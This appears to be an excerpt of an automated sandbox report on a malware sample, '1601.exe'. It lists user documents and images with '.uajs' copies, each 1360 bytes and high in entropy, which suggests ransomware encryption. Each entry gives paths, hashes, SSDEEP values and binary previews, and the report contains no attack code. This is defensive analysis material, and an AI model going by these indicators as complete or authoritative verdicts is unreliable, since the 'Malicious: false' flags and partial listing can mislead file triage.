Preview:	GIGIY.Ry......d..5\....#{.;.b0..7...D...4...}_.....g.....@.......EYAR.-.~vM=..~.u,.?i..,.r...%.".RN>.TrmX$..K.C]d........Bm.L...(mI....R..^..O}y......FO.C..'[.2.....w........f..0...P(I`f.#...1.?.D...+...RKT...@........@..TSU8yj&x.r..g..v!..,.sb1e........&..........4..._......5..g..".........@.@_V.d.o.4..#J.....b\sqi.{.Gk..%.6....9....a.Y.V.....V....[.v..=.Br..&.pkA!..@?....(M...z.z...1$}..\......Y.'5.....0.qW..<.t.ZP ....%7......u.(......:....D..:Y...1.{.@.w..N~.v.b......W.^>j.#).DnNq>.2.T...?Zq.L..&...A".....d._....H....3..4+~R!....My...;H....E...v.KA:fn.k@Bx....Dy1l.>)...+L..B.%...%AM.{....Y...d.=zKN.@3>...S.5Zo.,....{.. z+8@J...6.....;L.gJ.>..-.V.B.}s..&...l....Vn.\.M.5..a......k.J..a...J&.n.;P.......nL.]..'.L....~!......._t`...d..1..!:..5..&.,.x].f.X..?.c&...../A6ei..P......J...I.......~@v..9..._....]v.E....IA...y.p....+..o..:.....`F.mst..T7......ML...X5.].....b.c.9....G0.KEw..nAF ....dN..9.....6......+....]....u.....ka..;3.[..\

C:\Users\user\Documents\EOWRVPQCCS\QCOILOQIKC.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.840685211044461
Encrypted:	false
SSDEEP:	24:PfHsm7rzOX8teha0s8TNL+dObrZ6juDKUxpkRLUu1xWo3OO+PIG6ufUXw1bD:HscHOMoQV8pF16ydDGWbXPIQQyD
MD5:	424889D3B04AA8DE87AC8B7BCCA059FA
SHA1:	951CC9381E4895725AE364E72DA3F94DE0711E3A
SHA-256:	394A56D913C81C9FAB1BC62B37E2B84AB08CFE2EA3D5F46DAAF40AC3380F3AAE
SHA-512:	172557544FE4CC143B0B82EB8CB3F8D6C2084F8FFC38EC402264BCCC2DD85027C24BAD0FA844CC6B0498A05D39D2D08C6A88299C5444A9E99C9CBCFA8E8A5EE2
Malicious:	false
Preview:	QCOIL..#...Y.v%.e..F..c_V@.r..p./....L.....s.Y\.w..h..x.6@...De.~R..../.].C....h.l.....j.f..;....._r.^5.-t............T.;...j)..^P6.....Gl...V...L>....U.......TV.*{..c.LV..E.Q(..\|.O.HY.f..../'.....[..n.h..`D-..v.....k.rv....2."..<Q..W...F.F.._..H...8..i@.....9`.....&..RV>=..I..c..+..q.@aK.....Xd.YBy:9....lY..0..(..w..W..D]7......^!#f...j..l2....Tk......t/.3S.._.i..3...W}....,.l...{.&'..9..@......\|.t7>/q#..}5....a.o.......rQ>.A.....Mo\...W.)t...}..\|..Y.x......:T.,.R.K$..G...\|.R.x]./o/...\".K^)E..s..<..o.6<4n..5&N.:1..J.5~V...w.b....N.....5......>rN.boLS96..:.~<..?.d.V......E.2.ID{....lSU.l..6..Es.....>.G..2=yG.\|s....:.#nzK#...gt.+y`..>B..b.....w.G^sg...$.t..mO.K....{TT.F@.Q0.....o...g@.[...B{..IV......iH..vo}.0N&.\a....r.`L.9..28\F..)..w..QG.G.=..\|....X:....,.C{..x.9..$v$..P.n......\|....8(4B.=#.G.P.@7..DO...a.Y-...{E..'E.8..e.&.T..UF'9%..La.=c.6..&<.....$.)._.J.ld">`.c....2&..!M6Qp...~.Q....S]..C..W.R.F....B.P.gv.fY0~7...x..op....+..:...b..r._.

C:\Users\user\Documents\EOWRVPQCCS\QCOILOQIKC.png.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.840685211044461
Encrypted:	false
SSDEEP:	24:PfHsm7rzOX8teha0s8TNL+dObrZ6juDKUxpkRLUu1xWo3OO+PIG6ufUXw1bD:HscHOMoQV8pF16ydDGWbXPIQQyD
MD5:	424889D3B04AA8DE87AC8B7BCCA059FA
SHA1:	951CC9381E4895725AE364E72DA3F94DE0711E3A
SHA-256:	394A56D913C81C9FAB1BC62B37E2B84AB08CFE2EA3D5F46DAAF40AC3380F3AAE
SHA-512:	172557544FE4CC143B0B82EB8CB3F8D6C2084F8FFC38EC402264BCCC2DD85027C24BAD0FA844CC6B0498A05D39D2D08C6A88299C5444A9E99C9CBCFA8E8A5EE2
Malicious:	false
Preview:	QCOIL..#...Y.v%.e..F..c_V@.r..p./....L.....s.Y\.w..h..x.6@...De.~R..../.].C....h.l.....j.f..;....._r.^5.-t............T.;...j)..^P6.....Gl...V...L>....U.......TV.*{..c.LV..E.Q(..\|.O.HY.f..../'.....[..n.h..`D-..v.....k.rv....2."..<Q..W...F.F.._..H...8..i@.....9`.....&..RV>=..I..c..+..q.@aK.....Xd.YBy:9....lY..0..(..w..W..D]7......^!#f...j..l2....Tk......t/.3S.._.i..3...W}....,.l...{.&'..9..@......\|.t7>/q#..}5....a.o.......rQ>.A.....Mo\...W.)t...}..\|..Y.x......:T.,.R.K$..G...\|.R.x]./o/...\".K^)E..s..<..o.6<4n..5&N.:1..J.5~V...w.b....N.....5......>rN.boLS96..:.~<..?.d.V......E.2.ID{....lSU.l..6..Es.....>.G..2=yG.\|s....:.#nzK#...gt.+y`..>B..b.....w.G^sg...$.t..mO.K....{TT.F@.Q0.....o...g@.[...B{..IV......iH..vo}.0N&.\a....r.`L.9..28\F..)..w..QG.G.=..\|....X:....,.C{..x.9..$v$..P.n......\|....8(4B.=#.G.P.@7..DO...a.Y-...{E..'E.8..e.&.T..UF'9%..La.=c.6..&<.....$.)._.J.ld">`.c....2&..!M6Qp...~.Q....S]..C..W.R.F....B.P.gv.fY0~7...x..op....+..:...b..r._.

C:\Users\user\Documents\EOWRVPQCCS\TQDFJHPUIU.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.840830020710467
Encrypted:	false
SSDEEP:	24:gYZjwXWhgYWfHmObeQ1sEu1UO4KDHKL3OVFIFRUiLok1YGU8SZuOTkUOEw1bD:gejIWhDWfR9uEGUYDqbOVniL/LS1TkUm
MD5:	725D97629C56B2E281798CCE6B7E9D6F
SHA1:	FE9EE1F904A6055E469794C08EFAD1AA3C70E9E0
SHA-256:	7ACD3E99F309C806FB29699743A7A641D919B249F423F1C055AC757A073BFC11
SHA-512:	7E8B1C343D26C362492DBEAC8C90A030837FDB0B9BD29D0A470BAA8C899D0D38EAC476E1EB4761782B221731BA1F14AAC4BF6DAA6F47461228339BFB410C2C74
Malicious:	false
Preview:	TQDFJi{.yxi..9.`M.8O$..1..\....=}..`....3..2.te.18Z).K.E...E...:..O.......M....&z..<.ph...$Ras..E{lv..d...q..... ..Z..B..X.!...@.(.,.5c_n%.B.!......En;;...>.?.wPYO+..........\|{,.!j.C.....Dk85.M[.g.e.O.!F...Abb'..Dt.$...z...3.Y...c..F.a.Fw&.S5e....e...X..u[~.n.4aM....YB.X..S..uQ..Z[.x...N.A.{#rr....i.I......<...j...<...,E..C.Z...;.c...o.?.../e...D7.`.._..By.....qN!P...M......o.k...E...%Y...3./..Z....l.............\|H@...\|.w.ZW3.... N.(*...$'.M.w....'&.......I!.(...g.#.\egX.r.....+..........y.\|.....T.....l.+...mm..zwm...F%.Y.jo\|...\.SW....g.NB..=...[...2....U..5e...oQg../R...>..2}..\|&X.&.bo..u....G.uD=..k.a`.nK.[.l.......9\w...{...IWN..\.a.f...; .In..1[.. ..B.......+....a.v...x.C.......y.1&...Fo.T.;O...Na..4..6{II..y..8`.."..S.....T.....A......7......4..t.tq.......j.k...\|....?y.c..5."`.....X.-Q..;.....u..<d....d+..-...7......H.s.L,....O.=..(.......h.S......s~#....l......'.U....pE..6...B.`..^.".:.@.P.....F`KE2...P.........N..K...B...

C:\Users\user\Documents\EOWRVPQCCS\TQDFJHPUIU.jpg.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.840830020710467
Encrypted:	false
SSDEEP:	24:gYZjwXWhgYWfHmObeQ1sEu1UO4KDHKL3OVFIFRUiLok1YGU8SZuOTkUOEw1bD:gejIWhDWfR9uEGUYDqbOVniL/LS1TkUm
MD5:	725D97629C56B2E281798CCE6B7E9D6F
SHA1:	FE9EE1F904A6055E469794C08EFAD1AA3C70E9E0
SHA-256:	7ACD3E99F309C806FB29699743A7A641D919B249F423F1C055AC757A073BFC11
SHA-512:	7E8B1C343D26C362492DBEAC8C90A030837FDB0B9BD29D0A470BAA8C899D0D38EAC476E1EB4761782B221731BA1F14AAC4BF6DAA6F47461228339BFB410C2C74
Malicious:	false
Preview:	TQDFJi{.yxi..9.`M.8O$..1..\....=}..`....3..2.te.18Z).K.E...E...:..O.......M....&z..<.ph...$Ras..E{lv..d...q..... ..Z..B..X.!...@.(.,.5c_n%.B.!......En;;...>.?.wPYO+..........\|{,.!j.C.....Dk85.M[.g.e.O.!F...Abb'..Dt.$...z...3.Y...c..F.a.Fw&.S5e....e...X..u[~.n.4aM....YB.X..S..uQ..Z[.x...N.A.{#rr....i.I......<...j...<...,E..C.Z...;.c...o.?.../e...D7.`.._..By.....qN!P...M......o.k...E...%Y...3./..Z....l.............\|H@...\|.w.ZW3.... N.(*...$'.M.w....'&.......I!.(...g.#.\egX.r.....+..........y.\|.....T.....l.+...mm..zwm...F%.Y.jo\|...\.SW....g.NB..=...[...2....U..5e...oQg../R...>..2}..\|&X.&.bo..u....G.uD=..k.a`.nK.[.l.......9\w...{...IWN..\.a.f...; .In..1[.. ..B.......+....a.v...x.C.......y.1&...Fo.T.;O...Na..4..6{II..y..8`.."..S.....T.....A......7......4..t.tq.......j.k...\|....?y.c..5."`.....X.-Q..;.....u..<d....d+..-...7......H.s.L,....O.=..(.......h.S......s~#....l......'.U....pE..6...B.`..^.".:.@.P.....F`KE2...P.........N..K...B...

C:\Users\user\Documents\EOWRVPQCCS\ZIPXYXWIOY.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.859477427198008
Encrypted:	false
SSDEEP:	24:/fCuuOPELaisT44job1ilB1p36HRpMGhcbnIo8TQaP8rQww1bD:/fCuR8LaisTTcb1iP1p36PvlT+yD
MD5:	8CAB154F1B0A17C3C758E5B8E0F9499F
SHA1:	09E37317694F2DBA9ACA93E2074AC042BECE0988
SHA-256:	B8EEA9A69111FB509E73084ABAAEB7478266F43FEFBD619E7BE4FB154D404804
SHA-512:	A799EDC4AC812448885B4526AD52C57ACE77554F1521D115AAB845E89BA366A3F8BF5D67E71B9421CE8DD7191B5CAEEC642DB5CB8CABC48E2CF9DB5A4C345AAC
Malicious:	false
Preview:	ZIPXY.>.......)....5S../......u...j.....[9...23j........a.NG.W..8.v.....V\......I.l..:.."...f.O..C.6.Ds..V..cpm...V..}.D?.I.w......84l...w_...].n...%...s....Wo..H.P..4j.r......@{.^.2.l_.#8..3=.Z....Q..l.7.q........p3....Ol#.N.....m.l...M.~.O.A"rgd.D....c...;....!}..%....%p<8....N..F(....x..zm..m,e'Sv.2.il\|:.(..)7.`~Ge.W..r..8L%.....;...../.~g."+u.T..#.G..$..x.O...ma?..U.... \6:b{.g..tL.?'o.A.\|"Z,...R].b..._.0&..,.li.@(.S.R...#....B.Q.}.7.....n\|=."ETP...5../F.k...vW.pm&.A)l...j:.0@..K.cJ..s....'...\|_...>...V...F.C..c....X..-.........YB-05.."3d...G.&='/....S8T94.M...z.....3.nb.U#.5>a.B.....2.\.Q..Y.L....-.Gv.Y:9...N...P.....M......+..j.....$kO.Q.-....F.F....l.....%DZ...s0..Y.e..H....M..;.9..v.!.y..h..5C..4...:..Q....V.T...@.......8..vg.,.$....B.\ 2.......e..../Eb+.xJyW@@..2{...'..B...-Z'.q...Rf\|..<.&u6f...<yee...v..?'./.Fn.RS..-.}.$a0.<..FS......8.......E.7....t..m..w.o}.!/.D....;..}......\.l.W......Pb.=w...[.......o...~.b.T.Ka..u...Gf8

C:\Users\user\Documents\EOWRVPQCCS\ZIPXYXWIOY.mp3.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.859477427198008
Encrypted:	false
SSDEEP:	24:/fCuuOPELaisT44job1ilB1p36HRpMGhcbnIo8TQaP8rQww1bD:/fCuR8LaisTTcb1iP1p36PvlT+yD
MD5:	8CAB154F1B0A17C3C758E5B8E0F9499F
SHA1:	09E37317694F2DBA9ACA93E2074AC042BECE0988
SHA-256:	B8EEA9A69111FB509E73084ABAAEB7478266F43FEFBD619E7BE4FB154D404804
SHA-512:	A799EDC4AC812448885B4526AD52C57ACE77554F1521D115AAB845E89BA366A3F8BF5D67E71B9421CE8DD7191B5CAEEC642DB5CB8CABC48E2CF9DB5A4C345AAC
Malicious:	false
Preview:	ZIPXY.>.......)....5S../......u...j.....[9...23j........a.NG.W..8.v.....V\......I.l..:.."...f.O..C.6.Ds..V..cpm...V..}.D?.I.w......84l...w_...].n...%...s....Wo..H.P..4j.r......@{.^.2.l_.#8..3=.Z....Q..l.7.q........p3....Ol#.N.....m.l...M.~.O.A"rgd.D....c...;....!}..%....%p<8....N..F(....x..zm..m,e'Sv.2.il\|:.(..)7.`~Ge.W..r..8L%.....;...../.~g."+u.T..#.G..$..x.O...ma?..U.... \6:b{.g..tL.?'o.A.\|"Z,...R].b..._.0&..,.li.@(.S.R...#....B.Q.}.7.....n\|=."ETP...5../F.k...vW.pm&.A)l...j:.0@..K.cJ..s....'...\|_...>...V...F.C..c....X..-.........YB-05.."3d...G.&='/....S8T94.M...z.....3.nb.U#.5>a.B.....2.\.Q..Y.L....-.Gv.Y:9...N...P.....M......+..j.....$kO.Q.-....F.F....l.....%DZ...s0..Y.e..H....M..;.9..v.!.y..h..5C..4...:..Q....V.T...@.......8..vg.,.$....B.\ 2.......e..../Eb+.xJyW@@..2{...'..B...-Z'.q...Rf\|..<.&u6f...<yee...v..?'./.Fn.RS..-.}.$a0.<..FS......8.......E.7....t..m..w.o}.!/.D....;..}......\.l.W......Pb.=w...[.......o...~.b.T.Ka..u...Gf8

C:\Users\user\Documents\EWZCVGNOWT.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.864042414901034
Encrypted:	false
SSDEEP:	24:dn22AT+gS86J78wKs9nKh4kDZ77fqpQPp6tPG22cNAiFw1bD:dn22ATI78wUh4kDV7fqCB6tPG7iFyD
MD5:	1858AE0DC4421AED202DE9F7B116F689
SHA1:	531E3E598B0F587D3FB8F9386722516CBD9B980D
SHA-256:	2E050350ABE8178491DE9A7D98D8D8ACE07F407650E7AB6BA9DF766B964094C9
SHA-512:	DF603D26936A74133E0BFC6FDB00F48AE5966FD3890C928650F140B06B57865E28F2ACF0CB84AAD8BEFC53766D76AD2531A4BB80CFDAD6E8A216D57F1E321B14
Malicious:	false
Preview:	EWZCVG.........Ua.u.E.....Fa......].l...J.Q.$.y...pA...7.Z.....m....fhI..!.\|.(s..S...]0e.k.q-\.f...].^..(..Jl...K%b..mVB.w..\|(.pr.K.^_..1\.V.l..f...[..D.V.!l.../..{~..3.Z..n.U..L).N.8....8..yX......6.#.tV........[E......[....b.+.FH.$.o...\|uu.>....1Z.=..nq.7....0.Y...S..\cZ.U...TQ.r.1.w...AO....aj\|..~C.4_...~S........t.7....'nv.....a....^..f.<.........9..I.J.e..p..-.C.....(.O..v.?.xp.;..K..Bx.......g.?y.O..NP...+!d.N.+..S.}C.\;.>e..qp.....n...^.(......d,S.(...2.c...\.....a.W.r..9.+..Og..&Iv.8. ./L/.......q.W{..... 9j.B.S.-..P..r%WQ.q5.28.AO(.;..UL..1.J...j....... C.......2...=.."g!....LO.~..<..y%......x...g.<.Z..x.K.}..d.~...p.....l..y`...m.l9.9.;.....o..p.@....}.J............b....s.g=;..>H....p/..,...B.w.U..6,...1......i~...K...<..4mC.mL.J.U...[IR.sT..0.QAwv)....$j.u.d.......si.-.6...?i...b1?._.Z.%.$...u..#....qu^.C...A@.Uz..S...PK2.'.`.c.I...=~:..'..N.0O........\|4.@1.....$.DB?....._......H...~..U..._%.. ...n.].z.e..V5..m.G...<.

C:\Users\user\Documents\EWZCVGNOWT.mp3.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.864042414901034
Encrypted:	false
SSDEEP:	24:dn22AT+gS86J78wKs9nKh4kDZ77fqpQPp6tPG22cNAiFw1bD:dn22ATI78wUh4kDV7fqCB6tPG7iFyD
MD5:	1858AE0DC4421AED202DE9F7B116F689
SHA1:	531E3E598B0F587D3FB8F9386722516CBD9B980D
SHA-256:	2E050350ABE8178491DE9A7D98D8D8ACE07F407650E7AB6BA9DF766B964094C9
SHA-512:	DF603D26936A74133E0BFC6FDB00F48AE5966FD3890C928650F140B06B57865E28F2ACF0CB84AAD8BEFC53766D76AD2531A4BB80CFDAD6E8A216D57F1E321B14
Malicious:	false
Preview:	EWZCVG.........Ua.u.E.....Fa......].l...J.Q.$.y...pA...7.Z.....m....fhI..!.\|.(s..S...]0e.k.q-\.f...].^..(..Jl...K%b..mVB.w..\|(.pr.K.^_..1\.V.l..f...[..D.V.!l.../..{~..3.Z..n.U..L).N.8....8..yX......6.#.tV........[E......[....b.+.FH.$.o...\|uu.>....1Z.=..nq.7....0.Y...S..\cZ.U...TQ.r.1.w...AO....aj\|..~C.4_...~S........t.7....'nv.....a....^..f.<.........9..I.J.e..p..-.C.....(.O..v.?.xp.;..K..Bx.......g.?y.O..NP...+!d.N.+..S.}C.\;.>e..qp.....n...^.(......d,S.(...2.c...\.....a.W.r..9.+..Og..&Iv.8. ./L/.......q.W{..... 9j.B.S.-..P..r%WQ.q5.28.AO(.;..UL..1.J...j....... C.......2...=.."g!....LO.~..<..y%......x...g.<.Z..x.K.}..d.~...p.....l..y`...m.l9.9.;.....o..p.@....}.J............b....s.g=;..>H....p/..,...B.w.U..6,...1......i~...K...<..4mC.mL.J.U...[IR.sT..0.QAwv)....$j.u.d.......si.-.6...?i...b1?._.Z.%.$...u..#....qu^.C...A@.Uz..S...PK2.'.`.c.I...=~:..'..N.0O........\|4.@1.....$.DB?....._......H...~..U..._%.. ...n.].z.e..V5..m.G...<.

C:\Users\user\Documents\GIGIYTFFYT.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.848569007813216
Encrypted:	false
SSDEEP:	24:UMEig524lQKsFg396Gumpz+wUL98x9iH9KQoFcPsB5qldh2gTD3vahY2w1bD:3UQKsFuR9z+Xyx9iHYNcPsB5qzh2eD4E
MD5:	BCB27DFF7ACECC55D48584E37C45D0BF
SHA1:	E07A616772A9723C10146AFA4837E3386ADE99C4
SHA-256:	7663EB1BC9C58EE3DC50495211089E879207B25B08933C3B9753AA3E48B6A0C4
SHA-512:	E516AEE7E884411DE3BF5BB51FF0DAD12DD556EB6C8DA68CC6C5F3A9F3AA4A2FF38876122FCCCF2489486C69D562B2FA8ADDEC7ACEFFF6CCF88FD39C9B43F40E
Malicious:	false
Preview:	GIGIY.i...........G.K.i........:.U....vS7....L.5..N.......M...-.....9....g)+....D.<.m....e-.ao.....;c....N.m..P\|.4...q.c...S.(s...w...........+.DU4.p.8S..<O...Z.^c.'O.."....e\.A< -.Q.q../A...jnON./.GF..<.Y....,...t....7z.n.&.#..=.....+..s.. .z.....K....#......l.D...%........?8.9..Fs......t....c..fMew).I.".3...&.C..FL.d~.rHI...([9T....~.E.zO..X......'........&.;.\|...Dk.J..D......d.].....5..-..2..EE..}...3.QN......R..n'K..:-N..3.....%,P..z....e.....,.0...5....1.F..$.@.$..`J......,..aa@....P#~&1g7.......4H.S>....7b............C....=..'.....pP..$.I..KJ...<R.c:..<.m..&..`n......k.2qP....../.......~;......U..=A..........^P...m.L.iq....X.Y........4mh.hr.Gn...~dW.C<..N.Y.'.f"B.~...........J..-......FA2Y.1...Fp`.~;b..'.!W.~....I..z.=).........}`.^.{._u.&yPi>./..c..+...../.O.=...G..s.8=....B.m.@..R.*.H..."S.....$^.+]!R......1..y.t...S...a.!.05.xa....y=...../.....;J.. .w.r..lR...`.;..j.}.'.NPD .........A...Z.W..,..k..5`he..'....A

C:\Users\user\Documents\GIGIYTFFYT.pdf.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.848569007813216
Encrypted:	false
SSDEEP:	24:UMEig524lQKsFg396Gumpz+wUL98x9iH9KQoFcPsB5qldh2gTD3vahY2w1bD:3UQKsFuR9z+Xyx9iHYNcPsB5qzh2eD4E
MD5:	BCB27DFF7ACECC55D48584E37C45D0BF
SHA1:	E07A616772A9723C10146AFA4837E3386ADE99C4
SHA-256:	7663EB1BC9C58EE3DC50495211089E879207B25B08933C3B9753AA3E48B6A0C4
SHA-512:	E516AEE7E884411DE3BF5BB51FF0DAD12DD556EB6C8DA68CC6C5F3A9F3AA4A2FF38876122FCCCF2489486C69D562B2FA8ADDEC7ACEFFF6CCF88FD39C9B43F40E
Malicious:	false
Preview:	GIGIY.i...........G.K.i........:.U....vS7....L.5..N.......M...-.....9....g)+....D.<.m....e-.ao.....;c....N.m..P\|.4...q.c...S.(s...w...........+.DU4.p.8S..<O...Z.^c.'O.."....e\.A< -.Q.q../A...jnON./.GF..<.Y....,...t....7z.n.&.#..=.....+..s.. .z.....K....#......l.D...%........?8.9..Fs......t....c..fMew).I.".3...&.C..FL.d~.rHI...([9T....~.E.zO..X......'........&.;.\|...Dk.J..D......d.].....5..-..2..EE..}...3.QN......R..n'K..:-N..3.....%,P..z....e.....,.0...5....1.F..$.@.$..`J......,..aa@....P#~&1g7.......4H.S>....7b............C....=..'.....pP..$.I..KJ...<R.c:..<.m..&..`n......k.2qP....../.......~;......U..=A..........^P...m.L.iq....X.Y........4mh.hr.Gn...~dW.C<..N.Y.'.f"B.~...........J..-......FA2Y.1...Fp`.~;b..'.!W.~....I..z.=).........}`.^.{._u.&yPi>./..c..+...../.O.=...G..s.8=....B.m.@..R.*.H..."S.....$^.+]!R......1..y.t...S...a.!.05.xa....y=...../.....;J.. .w.r..lR...`.;..j.}.'.NPD .........A...Z.W..,..k..5`he..'....A

C:\Users\user\Documents\PALRGUCVEH.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.837169154100774
Encrypted:	false
SSDEEP:	24:4EFj+mM74YV18duQNzn0miSY2RGasMIr3gjWfATEjVmYTZ+ufgTsFnQJLrT3SQ0a:L9fYV18MQJ05SYStsPgjaXTkufgTsFC3
MD5:	4A49BD2954C81E2AB200148DEBAAF0E6
SHA1:	8814E7ABB5D23C157272FA448538C1225E29764D
SHA-256:	1D8C7472A1696BA6638E74BDC3DE20A868AF3485D231278E0033E91C42CD6F3A
SHA-512:	23F67A7A04B47F40D1805E6DC83F14F3D46E398E6500C131A4C34C0F0F353A52D5CF91B31F82311E3FB780F20DBC2FAD4FA1F3FDE744B79877429F44EE83D0F4
Malicious:	false
Preview:	PALRG.....B.2.e.LT..p...?.P;.%....l.6h.4e....T.s...G...+dQ.n/.1K.G.,.%K..d.,--.$Z.Ye...R....(....$..oYDa2.e..!8E...Gb...>t.tL..d=_^0M..x6...+....or9.iSnX...!..A.U>...W..M..t..sp.Y....PV..\.z..~..,......$.B%..w..1?E.A.....(B.!.......j..W.^..R.&..N......kI...B.(/...0.R..%S~O.R..U2._y.."[....5\|.R.z..........`..+.(u.\IM......I3[...B..i6.4..b<..;(<77.pt..l3..z....q.{......C.-,Z#3...\Z..}.t.\|\|k\....b....../EX@9..I....".b..bv.y..........dii8..F}P>@!...d.T....'{...&..MFw.....SK...Y.c@.....S.C.'.p..._.y4Q.....G....B...O.W[\|v8.......q.t.l_Ie.-.)..KV......h .g.q...a"w..bJ.I}...D..t}.t#LzH.y9.S.DE..F.....7Y....h......uSQ`.<.uG.J..).'...s.M..Z.tg..]...!.......U2..L\~K.B.u..e.B?..X./.Zj-.S....7..'6Jv.7TL..X...kZ..]S........%.1n....xkx...}B.&.q.j{..q..$..mOv.D(.m}.".J...:.....s..XT.+.yM.+%.4..'.D;.>7x..a .h..\|=..<..4.)z_..(c5.`..G..../..b..9.B.~S.u&]i.{..H..]...f..Qj..~1.z..z;.%..dN~...Qh.....\|Q+b;.9+...P.%.M...........)].x....nT...cYbq.L......YT.!..N..

C:\Users\user\Documents\PALRGUCVEH.docx.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.837169154100774
Encrypted:	false
SSDEEP:	24:4EFj+mM74YV18duQNzn0miSY2RGasMIr3gjWfATEjVmYTZ+ufgTsFnQJLrT3SQ0a:L9fYV18MQJ05SYStsPgjaXTkufgTsFC3
MD5:	4A49BD2954C81E2AB200148DEBAAF0E6
SHA1:	8814E7ABB5D23C157272FA448538C1225E29764D
SHA-256:	1D8C7472A1696BA6638E74BDC3DE20A868AF3485D231278E0033E91C42CD6F3A
SHA-512:	23F67A7A04B47F40D1805E6DC83F14F3D46E398E6500C131A4C34C0F0F353A52D5CF91B31F82311E3FB780F20DBC2FAD4FA1F3FDE744B79877429F44EE83D0F4
Malicious:	false
Preview:	PALRG.....B.2.e.LT..p...?.P;.%....l.6h.4e....T.s...G...+dQ.n/.1K.G.,.%K..d.,--.$Z.Ye...R....(....$..oYDa2.e..!8E...Gb...>t.tL..d=_^0M..x6...+....or9.iSnX...!..A.U>...W..M..t..sp.Y....PV..\.z..~..,......$.B%..w..1?E.A.....(B.!.......j..W.^..R.&..N......kI...B.(/...0.R..%S~O.R..U2._y.."[....5\|.R.z..........`..+.(u.\IM......I3[...B..i6.4..b<..;(<77.pt..l3..z....q.{......C.-,Z#3...\Z..}.t.\|\|k\....b....../EX@9..I....".b..bv.y..........dii8..F}P>@!...d.T....'{...&..MFw.....SK...Y.c@.....S.C.'.p..._.y4Q.....G....B...O.W[\|v8.......q.t.l_Ie.-.)..KV......h .g.q...a"w..bJ.I}...D..t}.t#LzH.y9.S.DE..F.....7Y....h......uSQ`.<.uG.J..).'...s.M..Z.tg..]...!.......U2..L\~K.B.u..e.B?..X./.Zj-.S....7..'6Jv.7TL..X...kZ..]S........%.1n....xkx...}B.&.q.j{..q..$..mOv.D(.m}.".J...:.....s..XT.+.yM.+%.4..'.D;.>7x..a .h..\|=..<..4.)z_..(c5.`..G..../..b..9.B.~S.u&]i.{..H..]...f..Qj..~1.z..z;.%..dN~...Qh.....\|Q+b;.9+...P.%.M...........)].x....nT...cYbq.L......YT.!..N..

C:\Users\user\Documents\PALRGUCVEH\DUUDTUBZFW.xlsx

Download File

Process:	C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.830172675409441
Encrypted:	false
SSDEEP:	24:/0QVnzUgzognqPDBnGCgMd6MTqIh7JO6EZ55D64AdI8X+9MHw1bD:LVzFDk/XLq+REZ55Adb+aHyD
MD5:	D233FDB6B5941A3DE55F0DF4574643E6
SHA1:	80771AFCEDA96E4FD549EA6F407F2EE52C692505
SHA-256:	36375BAC69F5657EC112A264BDA82B03EAC94FF471526855FED515D8F1CCA917
SHA-512:	44190A74AB50986B8611C0532C9CA692F9A758998A0A516FD0DCE7BA9384A112872CE27949BCE5FC0F2523B60188F2B0FC7424FCE6FB80F8DC67281EEA107F00
Malicious:	false
Preview:	DUUDT.t..I..........9.C..>}CC..@...N........vl.1..n...MY./........0.....G~..x...GF.IAVB....1....FC.8..6.P.%.g.X\...N.[...c....z..a...X..e...]'0..]V.&.K(Q...#8.>!.....[.....$Z....>...Q.4....e$..-.!CbXP..9u.x......B-.;..[E......W...Q;...nd.#.~...."..<7..+...YFRk.:..GS.a..jF,.W.....d..o....Zw...Qi.m..,D....b..K.....@........]c=0i..s2..6c.D.%z...QN.n...vF..N.c.R.o.Spz......B..9.........!..P.<.fNh....<...\.@.w.~.gjl.c...U....f..\Hr..m.....9".......b........._..G..(.j....q..E.....&..1....i..i...6$z.v..mS.U,.A....ED}.%3.j.q.....n........L...1."......)..M.....=L. ...1.2....S.(.m.)q@....#...).t.....b......!X.=..x..$..0...N.._.1....N.H..^.Z?qS..=-.....Ck2.Gn...0,.7.....7E.9[.......u.l....\|~.L..E...?..l..T..3.....(F...).^...b.....]..d..ux..r..>...cR.2..$..u.;3!Xr:Ql....+...+.X0?....z.....`D.....)9v..!..,1.n..m..1.97f.S.K?e.........v.\|Y..E.?c.....N.Qu..".....V.y.k.H..0r...}8n..}...1..?..F.:+.*M._H..V_.....e..n....Xk...9L.m.N...75H.Z

C:\Users\user\Documents\PALRGUCVEH\DUUDTUBZFW.xlsx.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.830172675409441
Encrypted:	false
SSDEEP:	24:/0QVnzUgzognqPDBnGCgMd6MTqIh7JO6EZ55D64AdI8X+9MHw1bD:LVzFDk/XLq+REZ55Adb+aHyD
MD5:	D233FDB6B5941A3DE55F0DF4574643E6
SHA1:	80771AFCEDA96E4FD549EA6F407F2EE52C692505
